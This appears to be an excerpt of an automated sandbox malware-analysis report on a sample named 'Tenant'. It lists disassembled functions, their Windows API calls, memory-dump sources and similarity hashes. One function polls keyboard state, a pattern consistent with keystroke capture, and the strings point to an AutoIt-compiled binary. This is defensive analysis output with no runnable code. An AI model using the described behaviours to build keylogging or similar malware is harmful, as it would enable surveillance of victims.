                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00B0DDE7
                                                                                        • _memset.LIBCMT ref: 00B0DE24
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00B0DE60
                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B0DE83
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00B0DE8A
                                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00B0DEC1
                                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 00B0DEC3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1246142700-0
                                                                                        • Opcode ID: e7948d0b218d03b468ada234244f192eb69b8236790cebb4ecd9ff809af638cd
                                                                                        • Instruction ID: 861750f64e2b9db8bffc2e635464e31e51b94b59be9d55f79a9a70fca1cd3d46
                                                                                        • Opcode Fuzzy Hash: e7948d0b218d03b468ada234244f192eb69b8236790cebb4ecd9ff809af638cd
                                                                                        • Instruction Fuzzy Hash: 01B1FC75A00109AFDB14DFA4C998DAEBBF9FF49304B148499F905EB2A1DB30EE45CB50
                                                                                        Function 00B0081B Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 00B00896
                                                                                        • SetKeyboardState.USER32(?), ref: 00B00901
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00B00921
                                                                                        • GetKeyState.USER32(000000A0), ref: 00B00938
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00B00967
                                                                                        • GetKeyState.USER32(000000A1), ref: 00B00978
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00B009A4
                                                                                        • GetKeyState.USER32(00000011), ref: 00B009B2
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00B009DB
                                                                                        • GetKeyState.USER32(00000012), ref: 00B009E9
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00B00A12
                                                                                        • GetKeyState.USER32(0000005B), ref: 00B00A20
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        • Opcode ID: f02d4db5b701766e6fa30b532ae114d5fab6d17562643927bd23d14944c7c3b6
                                                                                        • Instruction ID: 574274720f6f9bb0cfb3a47d6ac7eb6db692d2a26acb8b2456938c9e40110118
                                                                                        • Opcode Fuzzy Hash: f02d4db5b701766e6fa30b532ae114d5fab6d17562643927bd23d14944c7c3b6
                                                                                        • Instruction Fuzzy Hash: B751B820A1478829FB35FBB488557EABFF4DF01380F4885DAD5C6571C3DA649A8CCBA1
                                                                                        Function 00AFCE00 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00AFCE1C
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00AFCE2E
                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00AFCE8C
                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00AFCE97
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00AFCEA9
                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00AFCEFD
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00AFCF0B
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00AFCF1C
                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00AFCF5F
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00AFCF6D
                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00AFCF8A
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00AFCF97
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                        • String ID:
                                                                                        • API String ID: 3096461208-0
                                                                                        • Opcode ID: 8ff44d3ec39ecb8f8ed5a5f4c3e72ce6cc3252e8fcf4d9635e6b34e2e101dc6b
                                                                                        • Instruction ID: 1c95f9565504f777f9b999cd555809567c5b35a31b4d2336c5b6b89ddc19f745
                                                                                        • Opcode Fuzzy Hash: 8ff44d3ec39ecb8f8ed5a5f4c3e72ce6cc3252e8fcf4d9635e6b34e2e101dc6b
                                                                                        • Instruction Fuzzy Hash: 68514371B10209AFDB18DFA9CD95AAEBBB6EF88710F14812DF615D7294DB70AD008B50
                                                                                        Function 00AA23F7 Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00AA2412,?,00000000,?,?,?,?,00AA1AA7,00000000,?), ref: 00AA1F76
                                                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00AA24AF
                                                                                        • KillTimer.USER32(-00000001,?,?,?,?,00AA1AA7,00000000,?,?,00AA1EBE,?,?), ref: 00AA254A
                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00ADBFE7
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AA1AA7,00000000,?,?,00AA1EBE,?,?), ref: 00ADC018
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AA1AA7,00000000,?,?,00AA1EBE,?,?), ref: 00ADC02F
                                                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00AA1AA7,00000000,?,?,00AA1EBE,?,?), ref: 00ADC04B
                                                                                        • DeleteObject.GDI32(00000000), ref: 00ADC05D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 641708696-0
                                                                                        • Opcode ID: 23c03911aa75193582d4e01bd192251b4ead83b6f4a2796e77c9a305eb0a1637
                                                                                        • Instruction ID: 0febb4181be4ad7a23d9a4766195b8db6a6d0e43669ab3d057d9bb9c05be6af8
                                                                                        • Opcode Fuzzy Hash: 23c03911aa75193582d4e01bd192251b4ead83b6f4a2796e77c9a305eb0a1637
                                                                                        • Instruction Fuzzy Hash: 6C61AE31525602DFDB25AF19C958B3A77F1FF4532AF508529E04247AE0CBB9ACA0DF90
                                                                                        Function 00AA2581 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA29AB: GetWindowLongW.USER32(?,000000EB), ref: 00AA29BC
                                                                                        • GetSysColor.USER32(0000000F), ref: 00AA25AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ColorLongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 259745315-0
                                                                                        • Opcode ID: a7be66d19c42bdb390b93a889834a28705b0987fa1781fc294df5ec887a6628f
                                                                                        • Instruction ID: 1c5ac0655f5f0aab76f0c4d930ffe70a597549839fbedbdb883730d4d0713955
                                                                                        • Opcode Fuzzy Hash: a7be66d19c42bdb390b93a889834a28705b0987fa1781fc294df5ec887a6628f
                                                                                        • Instruction Fuzzy Hash: 4441BF31005540AFDB256F2C9C98BB93B66FF0A331F294265FD668B1E1DB308C51DB21
                                                                                        Function 00AB29BE Relevance: 18.0, APIs: 4, Strings: 6, Instructions: 478COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AC0B8B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00AB2A3E,?,00008000), ref: 00AC0BA7
                                                                                          • Part of subcall function 00AC0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB2A58,?,00008000), ref: 00AC02A4
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00AB2ADF
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00AB2C2C
                                                                                          • Part of subcall function 00AB3EBE: _wcscpy.LIBCMT ref: 00AB3EF6
                                                                                          • Part of subcall function 00AC386D: _iswctype.LIBCMT ref: 00AC3875
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                        • API String ID: 537147316-3738523708
                                                                                        • Opcode ID: 4dddcc127ac979cc336b3b27d10d0f6bc28e252264d7cc797ee88e733c0ec72e
                                                                                        • Instruction ID: 05e28923fb1f91fe409b3ebfe748e6991fc50cbf936e4edbc9640cdf12f2cfdf
                                                                                        • Opcode Fuzzy Hash: 4dddcc127ac979cc336b3b27d10d0f6bc28e252264d7cc797ee88e733c0ec72e
                                                                                        • Instruction Fuzzy Hash: 2E02AF311083419FC724EF24C991AAFBBE9EF89344F14492EF599932A3DB30D949CB42
                                                                                        Function 00B0AEEA Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharLowerBuffW.USER32(?,?,00B30980), ref: 00B0AF4E
                                                                                        • GetDriveTypeW.KERNEL32(00000061,00B5B5F0,00000061), ref: 00B0B018
                                                                                        • _wcscpy.LIBCMT ref: 00B0B042
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharDriveLowerType_wcscpy
                                                                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                        • API String ID: 2820617543-1000479233
                                                                                        • Opcode ID: 5ccc23c83b4d05f96c7e0fe36ceb971497391557e6a57fb576b3980a4f1a1ee6
                                                                                        • Instruction ID: baa01097e6bccb92a7531741465b7d0bfc9241336a851546943e23a4e8711726
                                                                                        • Opcode Fuzzy Hash: 5ccc23c83b4d05f96c7e0fe36ceb971497391557e6a57fb576b3980a4f1a1ee6
                                                                                        • Instruction Fuzzy Hash: F851DD711183059FC314EF14C9A1EAABBE5EF94310F50489DF892972E2EB70ED09CA42
                                                                                        Function 00AA4D37 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: __i64tow__itow__swprintf
                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                        • API String ID: 421087845-2263619337
                                                                                        • Opcode ID: 3a66d90df2f865e9e939cd104b921e407c437cd6afd07a90e390f0490467053e
                                                                                        • Instruction ID: 177dde9d9ad57f020e9c4d25662f78835c5304d8d5b48c2d5345eed597cc5002
                                                                                        • Opcode Fuzzy Hash: 3a66d90df2f865e9e939cd104b921e407c437cd6afd07a90e390f0490467053e
                                                                                        • Instruction Fuzzy Hash: 5541A271604209ABEB34DF68D941F7AB7F8AB49340F2044AFF54AD7392EA7199418B11
                                                                                        Function 00B27777 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B2778F
                                                                                        • CreateMenu.USER32 ref: 00B277AA
                                                                                        • SetMenu.USER32(?,00000000), ref: 00B277B9
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B27846
                                                                                        • IsMenu.USER32(?), ref: 00B2785C
                                                                                        • CreatePopupMenu.USER32 ref: 00B27866
                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00B27893
                                                                                        • DrawMenuBar.USER32 ref: 00B2789B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                        • String ID: 0$F
                                                                                        • API String ID: 176399719-3044882817
                                                                                        • Opcode ID: 8b0ff39eaf43f7717df48148bc3e23a218192dafa86f5549f2ee2a6615b0576f
                                                                                        • Instruction ID: 53b968c2b85b709fd9ba4436c660d778a7e0e15e030e8e03380177551e9e03d3
                                                                                        • Opcode Fuzzy Hash: 8b0ff39eaf43f7717df48148bc3e23a218192dafa86f5549f2ee2a6615b0576f
                                                                                        • Instruction Fuzzy Hash: 78415679A10219EFDB10DF65E888A9ABBF5FF48300F154169E949AB360DB30AD10CF94
                                                                                        Function 00B27AE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00B27B83
                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B27B8A
                                                                                        • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00B27B9D
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B27BA5
                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B27BB0
                                                                                        • DeleteDC.GDI32(00000000), ref: 00B27BB9
                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00B27BC3
                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00B27BD7
                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00B27BE3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                        • String ID: static
                                                                                        • API String ID: 2559357485-2160076837
                                                                                        • Opcode ID: 3f043450e3f2e0664c9925148a688e98e2fb7ba5d4cbb5050cfd8c76ed943497
                                                                                        • Instruction ID: 06f9bf8e0a8e986df00810d2109d1648377229be01a53c254c33a662b57a85eb
                                                                                        • Opcode Fuzzy Hash: 3f043450e3f2e0664c9925148a688e98e2fb7ba5d4cbb5050cfd8c76ed943497
                                                                                        • Instruction Fuzzy Hash: B9319031114229AFDF11AF64DC59FDF3BA9FF09720F210254FA19A21A0CB31D821DBA4
                                                                                        Function 00AC7030 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00AC706B
                                                                                          • Part of subcall function 00AC8D58: __getptd_noexit.LIBCMT ref: 00AC8D58
                                                                                        • __gmtime64_s.LIBCMT ref: 00AC7104
                                                                                        • __gmtime64_s.LIBCMT ref: 00AC713A
                                                                                        • __gmtime64_s.LIBCMT ref: 00AC7157
                                                                                        • __allrem.LIBCMT ref: 00AC71AD
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC71C9
                                                                                        • __allrem.LIBCMT ref: 00AC71E0
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC71FE
                                                                                        • __allrem.LIBCMT ref: 00AC7215
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AC7233
                                                                                        • __invoke_watson.LIBCMT ref: 00AC72A4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                        • String ID:
                                                                                        • API String ID: 384356119-0
                                                                                        • Opcode ID: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                        • Instruction ID: 540c2eab2df1ea068f502bc4891c35265a32f9075958b46f22cc24114a30091f
                                                                                        • Opcode Fuzzy Hash: f1a8c047e8f29504aad4589f782c76ed1b73a3870b2d4d8a344ebdfc9c3668e8
                                                                                        • Instruction Fuzzy Hash: DF71D572A04716ABDB149F79CD81F9EB3B9AF14320F15422EF515E7781E770DA408B90
                                                                                        Function 00B02CCE Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B02CE9
                                                                                        • GetMenuItemInfoW.USER32(00B67890,000000FF,00000000,00000030), ref: 00B02D4A
                                                                                        • SetMenuItemInfoW.USER32(00B67890,00000004,00000000,00000030), ref: 00B02D80
                                                                                        • Sleep.KERNEL32(000001F4), ref: 00B02D92
                                                                                        • GetMenuItemCount.USER32(?), ref: 00B02DD6
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00B02DF2
                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00B02E1C
                                                                                        • GetMenuItemID.USER32(?,?), ref: 00B02E61
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B02EA7
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B02EBB
                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B02EDC
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4176008265-0
                                                                                        • Opcode ID: 72e648fcdec8fbbd5e4e362b38c1cc2c954e834ebdc862b63172dbac4fa72fc9
                                                                                        • Instruction ID: 8eeed21df1eb20d02990eb6c58327fd7b80161b6ce0971ae08a3f19e10d30f60
                                                                                        • Opcode Fuzzy Hash: 72e648fcdec8fbbd5e4e362b38c1cc2c954e834ebdc862b63172dbac4fa72fc9
                                                                                        • Instruction Fuzzy Hash: D7617C70940249AFDF21DF64DD9CAAEBFF9EB41304F2445A9F841A7291DB31AD09DB20
                                                                                        Function 00B27548 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00B275CA
                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00B275CD
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00B275F1
                                                                                        • _memset.LIBCMT ref: 00B27602
                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B27614
                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00B2768C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
